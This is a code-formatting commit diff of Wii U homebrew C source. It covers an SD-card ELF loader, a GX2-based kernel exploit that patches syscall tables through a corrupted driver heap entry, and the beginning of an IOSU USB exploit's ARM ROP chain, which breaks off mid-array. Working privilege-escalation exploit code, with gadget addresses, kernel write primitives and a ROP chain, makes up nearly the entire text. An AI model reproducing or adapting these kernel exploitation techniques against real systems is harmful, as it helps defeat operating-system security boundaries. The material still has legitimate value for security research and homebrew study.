format code
parent
da8dfaafed
commit
75d940884d
@ -12,11 +12,10 @@
#include "elf_abi.h"
int32_t LoadFileToMem(const char *relativefilepath, char **fileOut, uint32_t * sizeOut) {
int32_t LoadFileToMem(const char *relativefilepath, char **fileOut, uint32_t *sizeOut) {
char path[256];
int result = 0;
char * sdRootPath = "";
char *sdRootPath = "";
if (!WHBMountSdCard()) {
WHBLogPrintf("Failed to mount SD Card...");
result = -1;
@ -24,9 +23,9 @@ int32_t LoadFileToMem(const char *relativefilepath, char **fileOut, uint32_t * s
}
sdRootPath = WHBGetSdCardMountPath();
sprintf(path, "%s/%s", sdRootPath,relativefilepath);
sprintf(path, "%s/%s", sdRootPath, relativefilepath);
WHBLogPrintf("Loading file %s.",path);
WHBLogPrintf("Loading file %s.", path);
*fileOut = WHBReadWholeFile(path, sizeOut);
if (!(*fileOut)) {
@ -35,55 +34,56 @@ int32_t LoadFileToMem(const char *relativefilepath, char **fileOut, uint32_t * s
goto exit;
}
exit:
exit:
WHBUnmountSdCard();
return result;
}
static void InstallMain(void *data_elf);
uint32_t load_loader_elf_from_sd(unsigned char* baseAddress, const char* relativePath) {
char * elf_data = NULL;
uint32_t load_loader_elf_from_sd(unsigned char *baseAddress, const char *relativePath) {
char *elf_data = NULL;
uint32_t fileSize = 0;
if(LoadFileToMem(relativePath, &elf_data, &fileSize) != 0) {
if (LoadFileToMem(relativePath, &elf_data, &fileSize) != 0) {
return 0;
}
InstallMain(elf_data);
Elf32_Ehdr* ehdr = ( Elf32_Ehdr*)elf_data;
Elf32_Ehdr *ehdr = (Elf32_Ehdr *) elf_data;
uint32_t res = ehdr->e_entry;
MEMFreeToDefaultHeap((void*)elf_data);
MEMFreeToDefaultHeap((void *) elf_data);
return res;
}
static unsigned int get_section(unsigned char *data, const char *name, unsigned int * size, unsigned int * addr, int fail_on_not_found) {
static unsigned int get_section(unsigned char *data, const char *name, unsigned int *size, unsigned int *addr, int fail_on_not_found) {
Elf32_Ehdr *ehdr = (Elf32_Ehdr *) data;
if ( !data
|| !IS_ELF (*ehdr)
|| (ehdr->e_type != ET_EXEC)
|| (ehdr->e_machine != EM_PPC)) {
if (!data
|| !IS_ELF (*ehdr)
|| (ehdr->e_type != ET_EXEC)
|| (ehdr->e_machine != EM_PPC)) {
OSFatal("Invalid elf file");
}
Elf32_Shdr *shdr = (Elf32_Shdr *) (data + ehdr->e_shoff);
int i;
for(i = 0; i < ehdr->e_shnum; i++) {
const char *section_name = ((const char*)data) + shdr[ehdr->e_shstrndx].sh_offset + shdr[i].sh_name;
if(strcmp(section_name, name) == 0) {
if(addr)
for (i = 0; i < ehdr->e_shnum; i++) {
const char *section_name = ((const char *) data) + shdr[ehdr->e_shstrndx].sh_offset + shdr[i].sh_name;
if (strcmp(section_name, name) == 0) {
if (addr)
*addr = shdr[i].sh_addr;
if(size)
if (size)
*size = shdr[i].sh_size;
return shdr[i].sh_offset;
}
}
if(fail_on_not_found)
OSFatal((char*)name);
if (fail_on_not_found)
OSFatal((char *) name);
return 0;
}
@ -98,11 +98,11 @@ static void InstallMain(void *data_elf) {
unsigned int section_offset = get_section(data_elf, ".text", &main_text_len, &main_text_addr, 1);
unsigned char *main_text = data_elf + section_offset;
/* Copy main .text to memory */
if(section_offset > 0) {
if (section_offset > 0) {
WHBLogPrintf("%08X %08X %d", main_text_addr, main_text, main_text_len);
memcpy((void*)(main_text_addr), (void *)main_text, main_text_len);
DCFlushRange((void*)main_text_addr, main_text_len);
ICInvalidateRange((void*)main_text_addr, main_text_len);
memcpy((void *) (main_text_addr), (void *) main_text, main_text_len);
DCFlushRange((void *) main_text_addr, main_text_len);
ICInvalidateRange((void *) main_text_addr, main_text_len);
}
@ -110,12 +110,12 @@ static void InstallMain(void *data_elf) {
unsigned int main_rodata_addr = 0;
unsigned int main_rodata_len = 0;
section_offset = get_section(data_elf, ".rodata", &main_rodata_len, &main_rodata_addr, 0);
if(section_offset > 0) {
if (section_offset > 0) {
unsigned char *main_rodata = data_elf + section_offset;
/* Copy main rodata to memory */
memcpy((void*)(main_rodata_addr), (void *)main_rodata, main_rodata_len);
DCFlushRange((void*)main_rodata_addr, main_rodata_len);
ICInvalidateRange((void*)main_rodata_addr, main_rodata_len);
memcpy((void *) (main_rodata_addr), (void *) main_rodata, main_rodata_len);
DCFlushRange((void *) main_rodata_addr, main_rodata_len);
ICInvalidateRange((void *) main_rodata_addr, main_rodata_len);
}
@ -123,24 +123,24 @@ static void InstallMain(void *data_elf) {
unsigned int main_data_addr = 0;
unsigned int main_data_len = 0;
section_offset = get_section(data_elf, ".data", &main_data_len, &main_data_addr, 0);
if(section_offset > 0) {
if (section_offset > 0) {
unsigned char *main_data = data_elf + section_offset;
/* Copy main data to memory */
memcpy((void*)(main_data_addr), (void *)main_data, main_data_len);
DCFlushRange((void*)main_data_addr, main_data_len);
ICInvalidateRange((void*)main_data_addr, main_data_len);
memcpy((void *) (main_data_addr), (void *) main_data, main_data_len);
DCFlushRange((void *) main_data_addr, main_data_len);
ICInvalidateRange((void *) main_data_addr, main_data_len);
}
// get the .bss section
unsigned int main_bss_addr = 0;
unsigned int main_bss_len = 0;
section_offset = get_section(data_elf, ".bss", &main_bss_len, &main_bss_addr, 0);
if(section_offset > 0) {
if (section_offset > 0) {
unsigned char *main_bss = data_elf + section_offset;
/* Copy main data to memory */
memcpy((void*)(main_bss_addr), (void *)main_bss, main_bss_len);
DCFlushRange((void*)main_bss_addr, main_bss_len);
ICInvalidateRange((void*)main_bss_addr, main_bss_len);
memcpy((void *) (main_bss_addr), (void *) main_bss, main_bss_len);
DCFlushRange((void *) main_bss_addr, main_bss_len);
ICInvalidateRange((void *) main_bss_addr, main_bss_len);
}
}
@ -1,5 +1,5 @@
#ifndef ELF_LOADING_H
#define ELF_LOADING_H
#define ELF_LOADING_H
#include <stdint.h>
@ -7,12 +7,12 @@
extern "C" {
#endif
int32_t LoadFileToMem(const char *relativefilepath, char **fileOut, uint32_t * sizeOut);
uint32_t load_loader_elf_from_sd(unsigned char* baseAddress, const char* relativePath);
int32_t LoadFileToMem(const char *relativefilepath, char **fileOut, uint32_t *sizeOut);
uint32_t load_loader_elf_from_sd(unsigned char *baseAddress, const char *relativePath);
#ifdef __cplusplus
}
#endif
#endif /* ELF_LOADING_H */
#endif /* ELF_LOADING_H */
@ -17,21 +17,20 @@
#include "utils/utils.h"
#define JIT_ADDRESS 0x01800000
#define JIT_ADDRESS 0x01800000
#define KERN_HEAP 0xFF200000
#define KERN_HEAP_PHYS 0x1B800000
#define KERN_HEAP 0xFF200000
#define KERN_HEAP_PHYS 0x1B800000
#define KERN_CODE_READ 0xFFF023D4
#define KERN_CODE_WRITE 0xFFF023F4
#define KERN_DRVPTR 0xFFEAB530
#define KERN_ADDRESS_TBL 0xFFEAB7A0
#define KERN_CODE_READ 0xFFF023D4
#define KERN_CODE_WRITE 0xFFF023F4
#define KERN_DRVPTR 0xFFEAB530
#define KERN_ADDRESS_TBL 0xFFEAB7A0
#define STARTID_OFFSET 0x08
#define METADATA_OFFSET 0x14
#define METADATA_SIZE 0x10
#define STARTID_OFFSET 0x08
#define METADATA_OFFSET 0x14
#define METADATA_SIZE 0x10
#define BAT_SETUP_HOOK_ADDR 0xFFF1D624
#define BAT_SETUP_HOOK_ENTRY 0x00880000
@ -63,7 +62,7 @@ static void *find_gadget(uint32_t code[], uint32_t length, uint32_t gadgets_star
uint32_t *ptr;
/* Search code before JIT area first */
for (ptr = (uint32_t*)gadgets_start; ptr != (uint32_t*)JIT_ADDRESS; ptr++) {
for (ptr = (uint32_t *) gadgets_start; ptr != (uint32_t *) JIT_ADDRESS; ptr++) {
if (!memcmp(ptr, &code[0], length))
return ptr;
}
@ -75,22 +74,22 @@ static void *find_gadget(uint32_t code[], uint32_t length, uint32_t gadgets_star
/* Chadderz's kernel write function */
void __attribute__((noinline)) kern_write(const void *addr, uint32_t value) {
asm volatile (
"li 3,1\n"
"li 4,0\n"
"mr 5,%1\n"
"li 6,0\n"
"li 7,0\n"
"lis 8,1\n"
"mr 9,%0\n"
"mr %1,1\n"
"li 0,0x3500\n"
"sc\n"
"nop\n"
"mr 1,%1\n"
:
: "r"(addr), "r"(value)
: "memory", "ctr", "lr", "0", "3", "4", "5", "6", "7", "8", "9", "10",
"11", "12"
"li 3,1\n"
"li 4,0\n"
"mr 5,%1\n"
"li 6,0\n"
"li 7,0\n"
"lis 8,1\n"
"mr 9,%0\n"
"mr %1,1\n"
"li 0,0x3500\n"
"sc\n"
"nop\n"
"mr 1,%1\n"
:
: "r"(addr), "r"(value)
: "memory", "ctr", "lr", "0", "3", "4", "5", "6", "7", "8", "9", "10",
"11", "12"
);
}
@ -101,14 +100,14 @@ int exploitThread(int argc, char **argv) {
OSDynLoad_Acquire("gx2.rpl", &gx2_handle);
void (*pGX2SetSemaphore)(uint64_t *sem, int action);
OSDynLoad_FindExport(gx2_handle, 0, "GX2SetSemaphore", (void**)&pGX2SetSemaphore);
uint32_t set_semaphore = ((uint32_t)pGX2SetSemaphore) + 0x2C;
OSDynLoad_FindExport(gx2_handle, 0, "GX2SetSemaphore", (void **) &pGX2SetSemaphore);
uint32_t set_semaphore = ((uint32_t) pGX2SetSemaphore) + 0x2C;
uint32_t gx2_init_attributes[9];
uint8_t *gx2CommandBuffer = (uint8_t*)memalign(0x40, 0x400000);
uint8_t *gx2CommandBuffer = (uint8_t *) memalign(0x40, 0x400000);
gx2_init_attributes[0] = 1;
gx2_init_attributes[1] = (uint32_t)gx2CommandBuffer;
gx2_init_attributes[1] = (uint32_t) gx2CommandBuffer;
gx2_init_attributes[2] = 2;
gx2_init_attributes[3] = 0x400000;
gx2_init_attributes[4] = 7;
@ -119,20 +118,20 @@ int exploitThread(int argc, char **argv) {
GX2Init(gx2_init_attributes); //don't actually know if this is necessary? so temp? (from loadiine or hbl idk)
/* Allocate space for DRVHAX */
uint32_t *drvhax = (uint32_t*) OSAllocFromSystem(0x4c, 4);
uint32_t *drvhax = (uint32_t *) OSAllocFromSystem(0x4c, 4);
/* Set the kernel heap metadata entry */
uint32_t *metadata = (uint32_t*) (KERN_HEAP + METADATA_OFFSET + (0x02000000 * METADATA_SIZE));
metadata[0] = (uint32_t)drvhax;
metadata[1] = (uint32_t)-0x4c;
metadata[2] = (uint32_t)-1;
metadata[3] = (uint32_t)-1;
uint32_t *metadata = (uint32_t *) (KERN_HEAP + METADATA_OFFSET + (0x02000000 * METADATA_SIZE));
metadata[0] = (uint32_t) drvhax;
metadata[1] = (uint32_t) -0x4c;
metadata[2] = (uint32_t) -1;
metadata[3] = (uint32_t) -1;
/* Find stuff */
uint32_t gx2data[] = {0xfc2a0000};
uint32_t gx2data_addr = (uint32_t) find_gadget(gx2data, 0x04, 0x10000000);
uint32_t doflush[] = {0xba810008, 0x8001003c, 0x7c0803a6, 0x38210038, 0x4e800020, 0x9421ffe0, 0xbf61000c, 0x7c0802a6, 0x7c7e1b78, 0x7c9f2378, 0x90010024};
void (*do_flush)(uint32_t arg0, uint32_t arg1) = (void (*)(uint32_t,uint32_t)) find_gadget(doflush, 0x2C, 0x01000000) + 0x14;
void (*do_flush)(uint32_t arg0, uint32_t arg1) = (void (*)(uint32_t, uint32_t)) find_gadget(doflush, 0x2C, 0x01000000) + 0x14;
/* Modify a next ptr on the heap */
uint32_t kpaddr = KERN_HEAP_PHYS + STARTID_OFFSET;
@ -148,44 +147,46 @@ int exploitThread(int argc, char **argv) {
/* Use DRVHAX to install the read and write syscalls */
uint32_t syscalls[2] = {KERN_CODE_READ, KERN_CODE_WRITE};
DCFlushRange(syscalls, 0x04*2);
DCFlushRange(syscalls, 0x04 * 2);
/* Modify its save area to point to the kernel syscall table */
drvhax[0x44/4] = KERN_SYSCALL_TBL_1 + (0x34 * 4);
drvhax[0x44 / 4] = KERN_SYSCALL_TBL_1 + (0x34 * 4);
CopyToSaveArea(drvname, 6, syscalls, 8);
drvhax[0x44/4] = KERN_SYSCALL_TBL_2 + (0x34 * 4);
drvhax[0x44 / 4] = KERN_SYSCALL_TBL_2 + (0x34 * 4);
CopyToSaveArea(drvname, 6, syscalls, 8);
drvhax[0x44/4] = KERN_SYSCALL_TBL_3 + (0x34 * 4);
drvhax[0x44 / 4] = KERN_SYSCALL_TBL_3 + (0x34 * 4);
CopyToSaveArea(drvname, 6, syscalls, 8);
drvhax[0x44/4] = KERN_SYSCALL_TBL_4 + (0x34 * 4);
drvhax[0x44 / 4] = KERN_SYSCALL_TBL_4 + (0x34 * 4);
CopyToSaveArea(drvname, 6, syscalls, 8);
drvhax[0x44/4] = KERN_SYSCALL_TBL_5 + (0x34 * 4);
drvhax[0x44 / 4] = KERN_SYSCALL_TBL_5 + (0x34 * 4);
CopyToSaveArea(drvname, 6, syscalls, 8);
/* Clean up the heap and driver list so we can exit */
kern_write((void*)(KERN_HEAP + STARTID_OFFSET), 0);
kern_write((void*)KERN_DRVPTR, drvhax[0x48/4]);
kern_write((void *) (KERN_HEAP + STARTID_OFFSET), 0);
kern_write((void *) KERN_DRVPTR, drvhax[0x48 / 4]);
// Install CopyData syscall
kern_write((void*)(KERN_SYSCALL_TBL_1 + (0x25 * 4)), (uint32_t)0x1800000);
kern_write((void*)(KERN_SYSCALL_TBL_2 + (0x25 * 4)), (uint32_t)0x1800000);
kern_write((void*)(KERN_SYSCALL_TBL_3 + (0x25 * 4)), (uint32_t)0x1800000);
kern_write((void*)(KERN_SYSCALL_TBL_4 + (0x25 * 4)), (uint32_t)0x1800000);
kern_write((void*)(KERN_SYSCALL_TBL_5 + (0x25 * 4)), (uint32_t)0x1800000);
kern_write((void *) (KERN_SYSCALL_TBL_1 + (0x25 * 4)), (uint32_t) 0x1800000);
kern_write((void *) (KERN_SYSCALL_TBL_2 + (0x25 * 4)), (uint32_t) 0x1800000);
kern_write((void *) (KERN_SYSCALL_TBL_3 + (0x25 * 4)), (uint32_t) 0x1800000);
kern_write((void *) (KERN_SYSCALL_TBL_4 + (0x25 * 4)), (uint32_t) 0x1800000);
kern_write((void *) (KERN_SYSCALL_TBL_5 + (0x25 * 4)), (uint32_t) 0x1800000);
/* clean shutdown */
GX2Shutdown();
free(gx2CommandBuffer);
return 0;
}
void KernelWriteU32(uint32_t addr, uint32_t value);
extern "C" void SC_KernelCopyData(uint32_t dst, uint32_t src, uint32_t len);
void KernelWrite(uint32_t addr, const void *data, uint32_t length) {
// This is a hacky workaround, but currently it only works this way. ("data" is always on the stack, so maybe a problem with mapping values from the JIT area?)
// further testing required.
for(int32_t i = 0; i<length; i +=4) {
KernelWriteU32(addr + i, *(uint32_t*)(data +i));
for (int32_t i = 0; i < length; i += 4) {
KernelWriteU32(addr + i, *(uint32_t *) (data + i));
}
}
@ -194,12 +195,12 @@ void KernelWriteU32(uint32_t addr, uint32_t value) {
DCFlushRange(&value, 4);
uint32_t dst = (uint32_t) OSEffectiveToPhysical(addr);
uint32_t src = (uint32_t) OSEffectiveToPhysical((uint32_t)&value);
uint32_t src = (uint32_t) OSEffectiveToPhysical((uint32_t) &value);
SC_KernelCopyData(dst, src, 4);
DCFlushRange((void *)addr, 4);
ICInvalidateRange((void *)addr, 4);
DCFlushRange((void *) addr, 4);
ICInvalidateRange((void *) addr, 4);
}
@ -208,7 +209,7 @@ void KernelWriteU32FixedAddr(uint32_t addr, uint32_t value) {
DCFlushRange(&value, 4);
uint32_t dst = (uint32_t) addr;
uint32_t src = (uint32_t) OSEffectiveToPhysical((uint32_t)&value);
uint32_t src = (uint32_t) OSEffectiveToPhysical((uint32_t) &value);
SC_KernelCopyData(dst, src, 4);
}
@ -239,29 +240,29 @@ extern "C" void SC_0x36_SETBATS(void);
int DoKernelExploit(void) {
WHBLogPrintf("Running GX2Sploit");
/* Make a thread to modify the semaphore */
OSThread *thread = (OSThread*)memalign(8, 0x1000);
uint8_t *stack = (uint8_t*)memalign(0x40, 0x2000);
OSThread *thread = (OSThread *) memalign(8, 0x1000);
uint8_t *stack = (uint8_t *) memalign(0x40, 0x2000);
OSSwitchSecCodeGenMode(0);
memcpy((void*)0x1800000, (void*)&SCKernelCopyData, 0x100);
memcpy((void *) 0x1800000, (void *) &SCKernelCopyData, 0x100);
unsigned int setIBAT0Addr = 0x1800200;
unsigned int * curAddr = (uint32_t*) setIBAT0Addr;
unsigned int *curAddr = (uint32_t *) setIBAT0Addr;
curAddr[0] = 0x7C0006AC;
curAddr[1] = 0x4C00012C;
curAddr[2] = 0x7C7083A6;
curAddr[3] = 0x7C9183A6;
curAddr[4] = 0x7C0006AC;
curAddr[5] = 0x4C00012C;
curAddr[6] = 0x4E800020;
curAddr[0] = 0x7C0006AC;
curAddr[1] = 0x4C00012C;
curAddr[2] = 0x7C7083A6;
curAddr[3] = 0x7C9183A6;
curAddr[4] = 0x7C0006AC;
curAddr[5] = 0x4C00012C;
curAddr[6] = 0x4E800020;
DCFlushRange((void*)0x1800000, 0x1000);
ICInvalidateRange((void*)0x1800000, 0x1000);
DCFlushRange((void *) 0x1800000, 0x1000);
ICInvalidateRange((void *) 0x1800000, 0x1000);
OSSwitchSecCodeGenMode(1);
if (OSCreateThread(thread, (OSThreadEntryPointFn)exploitThread, 0, NULL, stack + 0x2000, 0x2000, 0, 0x1) == 0) {
if (OSCreateThread(thread, (OSThreadEntryPointFn) exploitThread, 0, NULL, stack + 0x2000, 0x2000, 0, 0x1) == 0) {
OSFatal("Failed to create thread");
}
@ -271,10 +272,10 @@ int DoKernelExploit(void) {
free(stack);
unsigned char backupBuffer[0x40];
uint32_t targetBuffer[0x40/4];
uint32_t targetBuffer[0x40 / 4];
uint32_t targetAddress = 0x017FF000;
KernelWrite((uint32_t) backupBuffer, (void*) 0x017FF000, 0x40);
KernelWrite((uint32_t) backupBuffer, (void *) 0x017FF000, 0x40);
targetBuffer[0] = 0x7c7082a6; // mfspr r3, 528
targetBuffer[1] = 0x60630003; // ori r3, r3, 0x03
@ -284,26 +285,26 @@ int DoKernelExploit(void) {
targetBuffer[5] = 0x7c7283a6; // mtspr 530, r3
targetBuffer[6] = 0x7c0006ac; // eieio
targetBuffer[7] = 0x4c00012c; // isync
targetBuffer[8] = 0x3c600000 | (((uint32_t)SCSetupIBAT4DBAT5) >> 16); // lis r3, setup_syscall@h
targetBuffer[9] = 0x60630000 | (((uint32_t)SCSetupIBAT4DBAT5) & 0xFFFF); // ori r3, r3, setup_syscall@l
targetBuffer[8] = 0x3c600000 | (((uint32_t) SCSetupIBAT4DBAT5) >> 16); // lis r3, setup_syscall@h
targetBuffer[9] = 0x60630000 | (((uint32_t) SCSetupIBAT4DBAT5) & 0xFFFF); // ori r3, r3, setup_syscall@l
targetBuffer[10] = 0x7c6903a6; // mtctr r3
targetBuffer[11] = 0x4e800420; // bctr
DCFlushRange(targetBuffer, sizeof(targetBuffer));
KernelWrite((uint32_t) targetAddress, (void*) targetBuffer, 0x40);
KernelWrite((uint32_t) targetAddress, (void *) targetBuffer, 0x40);
/* set our setup syscall to an unused position */
kern_write((void*)(KERN_SYSCALL_TBL_1 + (0x36 * 4)), targetAddress);
kern_write((void*)(KERN_SYSCALL_TBL_2 + (0x36 * 4)), targetAddress);
kern_write((void*)(KERN_SYSCALL_TBL_3 + (0x36 * 4)), targetAddress);
kern_write((void*)(KERN_SYSCALL_TBL_4 + (0x36 * 4)), targetAddress);
kern_write((void*)(KERN_SYSCALL_TBL_5 + (0x36 * 4)), targetAddress);
kern_write((void *) (KERN_SYSCALL_TBL_1 + (0x36 * 4)), targetAddress);
kern_write((void *) (KERN_SYSCALL_TBL_2 + (0x36 * 4)), targetAddress);
kern_write((void *) (KERN_SYSCALL_TBL_3 + (0x36 * 4)), targetAddress);
kern_write((void *) (KERN_SYSCALL_TBL_4 + (0x36 * 4)), targetAddress);
kern_write((void *) (KERN_SYSCALL_TBL_5 + (0x36 * 4)), targetAddress);
/* run our kernel code :) */
SC_0x36_SETBATS();
/* repair data */
KernelWrite(targetAddress, backupBuffer, sizeof(backupBuffer));
DCFlushRange((void*)targetAddress, sizeof(backupBuffer));
DCFlushRange((void *) targetAddress, sizeof(backupBuffer));
WHBLogPrintf("GX2Sploit done");
return 1;
}
@ -20,11 +20,12 @@ extern const uint8_t launch_image_tga[];
extern const uint32_t launch_image_tga_size;
static void uhs_exploit_init(int uhs_handle);
static int uhs_write32(int uhs_handle, int arm_addr, int val);
//!------Variables used in exploit------
static int *pretend_root_hub = (int*)0xF5003ABC;
static int *ayylmao = (int*)0xF4500000;
static int *pretend_root_hub = (int *) 0xF5003ABC;
static int *ayylmao = (int *) 0xF4500000;
//!-------------------------------------
typedef struct __attribute__((packed)) {
@ -38,280 +39,280 @@ typedef struct __attribute__((packed)) {
/* ROP CHAIN STARTS HERE (0x1015BD78) */
static const int final_chain[] = {
0x101236f3, // 0x00 POP {R1-R7,PC}
0x0, // 0x04 arg
0x0812974C, // 0x08 stackptr CMP R3, #1; STREQ R1, [R12]; BX LR
0x68, // 0x0C stacksize
0x10101638, // 0x10
0x0, // 0x14
0x0, // 0x18
0x0, // 0x1C
0x1010388C, // 0x20 CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC}
0x0, // 0x24
0x0, // 0x28
0x1012CFEC, // 0x2C MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x30
0x0, // 0x34
IOS_CREATETHREAD, // 0x38
0x1, // 0x3C
0x2, // 0x40
0x10123a9f, // 0x44 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x00, // 0x48 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE92D4010, // 0x4C value: PUSH {R4,LR}
0x0, // 0x50
0x10123a8b, // 0x54 POP {R3,R4,PC}
0x1, // 0x58 R3 must be 1 for the arbitrary write
0x0, // 0x5C
0x1010CD18, // 0x60 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x64
0x0, // 0x68
0x1012EE64, // 0x6C set_panic_behavior (arbitrary write)
0x0, // 0x70
0x0, // 0x74
0x10123a9f, // 0x78 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x04, // 0x7C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE1A04000, // 0x80 value: MOV R4, R0
0x0, // 0x84
0x10123a8b, // 0x88 POP {R3,R4,PC}
0x1, // 0x8C R3 must be 1 for the arbitrary write
0x0, // 0x90
0x1010CD18, // 0x94 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x98
0x0, // 0x9C
0x1012EE64, // 0xA0 set_panic_behavior (arbitrary write)
0x0, // 0xA4
0x0, // 0xA8
0x10123a9f, // 0xAC POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x08, // 0xB0 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE3E00000, // 0xB4 value: MOV R0, #0xFFFFFFFF
0x0, // 0xB8
0x10123a8b, // 0xBC POP {R3,R4,PC}
0x1, // 0xC0 R3 must be 1 for the arbitrary write
0x0, // 0xC4
0x1010CD18, // 0xC8 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0xCC
0x0, // 0xD0
0x1012EE64, // 0xD4 set_panic_behavior (arbitrary write)
0x0, // 0xD8
0x0, // 0xDC
0x10123a9f, // 0xE0 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x0C, // 0xE4 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xEE030F10, // 0xE8 value: MCR P15, #0, R0, C3, C0, #0 (set dacr to R0)
0x0, // 0xEC
0x10123a8b, // 0xF0 POP {R3,R4,PC}
0x1, // 0xF4 R3 must be 1 for the arbitrary write
0x0, // 0xF8
0x1010CD18, // 0xFC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x100
0x0, // 0x104
0x1012EE64, // 0x108 set_panic_behavior (arbitrary write)
0x0, // 0x10C
0x0, // 0x110
0x10123a9f, // 0x114 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x10, // 0x118 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE1A00004, // 0x11C value: MOV R0, R4
0x0, // 0x120
0x10123a8b, // 0x124 POP {R3,R4,PC}
0x1, // 0x128 R3 must be 1 for the arbitrary write
0x0, // 0x12C
0x1010CD18, // 0x130 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x134
0x0, // 0x138
0x1012EE64, // 0x13C set_panic_behavior (arbitrary write)
0x0, // 0x140
0x0, // 0x144
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x14, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE12FFF33, // 0x150 value: BLX R3 KERNEL_MEMCPY
0x0, // 0x154
0x10123a8b, // 0x158 POP {R3,R4,PC}
0x1, // 0x15C R3 must be 1 for the arbitrary write
0x0, // 0x160
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x168
0x0, // 0x16C
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
0x0, // 0x174
0x0, // 0x178
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x18, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0x00000000, // 0x150 value: NOP
0x0, // 0x154
0x10123a8b, // 0x158 POP {R3,R4,PC}
0x1, // 0x15C R3 must be 1 for the arbitrary write
0x0, // 0x160
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x168
0x0, // 0x16C
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
0x0, // 0x174
0x0, // 0x178
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x1C, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xEE17FF7A, // 0x150 value: clean_loop: MRC p15, 0, r15, c7, c10, 3
0x0, // 0x154
0x10123a8b, // 0x158 POP {R3,R4,PC}
0x1, // 0x15C R3 must be 1 for the arbitrary write
0x0, // 0x160
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x168
0x0, // 0x16C
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
0x0, // 0x174
0x0, // 0x178
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x20, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0x1AFFFFFD, // 0x150 value: BNE clean_loop
0x0, // 0x154
0x10123a8b, // 0x158 POP {R3,R4,PC}
0x1, // 0x15C R3 must be 1 for the arbitrary write
0x0, // 0x160
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x168
0x0, // 0x16C
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
0x0, // 0x174
0x0, // 0x178
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x24, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xEE070F9A, // 0x150 value: MCR p15, 0, R0, c7, c10, 4
0x0, // 0x154
0x10123a8b, // 0x158 POP {R3,R4,PC}
0x1, // 0x15C R3 must be 1 for the arbitrary write
0x0, // 0x160
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x168
0x0, // 0x16C
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
0x0, // 0x174
0x0, // 0x178
0x10123a9f, // 0x17C POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x28, // 0x180 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE1A03004, // 0x184 value: MOV R3, R4
0x0, // 0x188
0x10123a8b, // 0x18C POP {R3,R4,PC}
0x1, // 0x190 R3 must be 1 for the arbitrary write
0x0, // 0x194
0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x19C
0x0, // 0x1A0
0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write)
0x0, // 0x1A8
0x0, // 0x1AC
0x10123a9f, // 0x17C POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x2C, // 0x180 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE8BD4010, // 0x184 value: POP {R4,LR}
0x0, // 0x188
0x10123a8b, // 0x18C POP {R3,R4,PC}
0x1, // 0x190 R3 must be 1 for the arbitrary write
0x0, // 0x194
0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x19C
0x0, // 0x1A0
0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write)
0x0, // 0x1A8
0x0, // 0x1AC
0x10123a9f, // 0x1B0 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x30, // 0x1B4 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE12FFF13, // 0x1B8 value: BX R3 our code :-)
0x0, // 0x1BC
0x10123a8b, // 0x1C0 POP {R3,R4,PC}
0x1, // 0x1C4 R3 must be 1 for the arbitrary write
0x0, // 0x1C8
0x1010CD18, // 0x1CC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x1D0
0x0, // 0x1D4
0x1012EE64, // 0x1D8 set_panic_behavior (arbitrary write)
0x0, // 0x1DC
